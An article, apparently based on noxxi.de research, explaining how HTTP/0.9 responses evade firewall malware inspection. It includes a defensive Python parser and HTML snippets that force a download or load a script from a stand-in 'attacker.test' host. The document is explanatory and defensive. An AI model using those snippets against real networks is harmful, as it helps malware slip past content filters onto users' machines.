HTTP Malware Analysis Evasion

In this article, published on NOXXI.de, the author explains which evasions of HTTP malware analysis are possible, as found with the HTTP Evader tool.

The very first version of the HTTP protocol was 0.9, introduced in early 1991. It consisted only of a GET request followed by a response from the server. Unlike HTTP 1.0 (specified in 1996), the response does not consist of a response header and a response body; it contains only the body. This means it is not possible to specify the data type (Content-Type), use compression (Content-Encoding) or give the length of the body (Content-Length), so the response simply ends when the server closes the underlying TCP connection.

The modern HTTP protocol is version 1.1, and a response looks similar to this:

  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Content-Length: 12

  malware-here

An HTTP 0.9 response is much simpler: the server sends only the body and then closes the connection:

  some-malware-here

Even today, modern browsers still accept both kinds of response, which opens the way to a new type of HTTP evasion.

Using HTTP 0.9 to Evade Malware Analysis

Unlike HTTP 1.x, the older protocol has no response header at all. One would therefore expect a firewall to block such a response, because it looks like a violation of the HTTP protocol, and no sane firewall today should assume that a real HTTP 0.9 server is still in production use. Alternatively, the firewall could run its malware analysis on the HTTP 0.9 response body.

Surprisingly, most of the firewalls tested by the author simply pass an HTTP/0.9 response through without further inspection. Of the 5 Gartner-Top-10 firewalls in the test reports submitted by users of HTTP Evader, only a single one blocks these responses; all the others (i.e. 80%) could be bypassed this way. Since they do not analyze HTTP 0.9 responses for malware, one has to assume that these firewalls simply let through everything they do not understand.
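The check that the passing firewall is missing is easy to state: a response stream that does not begin with a status line has no Content-Type and no Content-Length to route on, so the whole stream has to be treated as an untyped download and scanned, not passed through. The following Python is an added example, not code from the noxxi.de article or the HTTP Evader tool. It builds the two responses shown above, parses a raw response the way a browser does (no well-formed status line means HTTP/0.9), and returns the verdict a content-inspecting proxy should reach. The function names and the verdict strings ("scan-whole-stream", "length-mismatch", "scan-by-content-type") are illustrative choices for this example, and the sample traffic is constructed inline.

```python
"""Added example (not from the noxxi.de article or HTTP Evader): build
HTTP/0.9 and HTTP/1.1 responses and apply the check a content-inspecting
proxy should use so that a headerless 0.9 response is not passed through."""
import re
from dataclasses import dataclass, field
from typing import Dict, Optional

# Status line of an HTTP/1.x response, e.g. "HTTP/1.1 200 OK\r\n".
STATUS_LINE = re.compile(rb"^HTTP/(\d)\.(\d) (\d{3})(?: [^\r\n]*)?\r?\n")


@dataclass
class Response:
    version: str                          # "0.9", "1.0" or "1.1"
    status: Optional[int]                 # None for HTTP/0.9 (no status line)
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""
    declared_length: Optional[int] = None  # Content-Length value, if present


def build_http09_request(path: str) -> bytes:
    """HTTP/0.9 knows only GET and carries no protocol version or headers."""
    return b"GET " + path.encode("ascii") + b"\r\n"


def build_http09_response(body: bytes) -> bytes:
    """An HTTP/0.9 response is the raw body; the server closes the TCP
    connection to mark its end. No status line, no headers."""
    return body


def build_http11_response(body: bytes,
                          content_type: bytes = b"application/octet-stream") -> bytes:
    """A minimal HTTP/1.1 response with the headers the article discusses."""
    return (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: " + content_type + b"\r\n"
            b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n"
            b"\r\n" + body)


def parse_response(raw: bytes) -> Response:
    """Split a raw response the way a browser does: anything that does not
    start with a well-formed status line is treated as an HTTP/0.9 body."""
    m = STATUS_LINE.match(raw)
    if m is None:
        return Response(version="0.9", status=None, body=raw)
    version = f"{m.group(1).decode()}.{m.group(2).decode()}"
    status = int(m.group(3))
    rest = raw[m.end():]
    # Headers end at the first empty line; tolerate bare LF as well as CRLF.
    parts = re.split(rb"\r?\n\r?\n", rest, maxsplit=1)
    header_block = parts[0]
    body = parts[1] if len(parts) > 1 else b""
    headers: Dict[str, str] = {}
    for line in re.split(rb"\r?\n", header_block):
        if not line.strip():
            continue
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    declared = headers.get("content-length")
    length = int(declared) if declared is not None and declared.isdigit() else None
    return Response(version, status, headers, body, length)


def inspection_verdict(resp: Response) -> str:
    """What a content-inspecting firewall should do with this response.
    The evasion works because the tested firewalls effectively answer
    "pass-through" for the 0.9 case instead of scanning it."""
    if resp.version == "0.9":
        # No Content-Type to route on: scan the whole stream as an untyped download.
        return "scan-whole-stream"
    if resp.declared_length is not None and resp.declared_length != len(resp.body):
        # Body and Content-Length disagree: a truncated or desynced response.
        return "length-mismatch"
    return "scan-by-content-type"


if __name__ == "__main__":
    # Constructed sample traffic mirroring the article's two responses.
    for raw in (build_http11_response(b"malware-here"),
                build_http09_response(b"some-malware-here")):
        r = parse_response(raw)
        print(r.version, r.status, r.headers.get("content-type"), inspection_verdict(r))
```

Note that a malformed status line (for instance one with a version but no status code) also fails the regex and is classified as 0.9; that mirrors browser behaviour and is the safe direction for an inspector, since the stream then gets scanned rather than trusted on the strength of a half-parsed header.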

Since HTTP 0.9 was only ever used to deliver HTML (no content type could be specified), one might consider it harmless because the response only gets displayed in the browser. But by combining the old HTTP 0.9 with modern HTML5, one can simply force a download using the download attribute:

   <a href="http://attacker.test/http09-response" download="malware.exe">

Similarly, an HTTP 0.9 response can be used as a script, an image or an HTML page by embedding it in the appropriate context:

   <script src="http://attacker.test/http09-response.js">
   <img src="http://attacker.test/http09-response.gif">
   <a href="http://attacker.test/http09-response.html">

Because the response carries no Content-Type header, any filtering based on the type of the content can be bypassed the same way.

If you are behind a content-filtering firewall, you can test whether its malware analysis of HTTP traffic can be evaded by this or other methods. All you need is a browser; then follow the instructions to test against the HTTP Evader tool.

Source NOXXI.DE
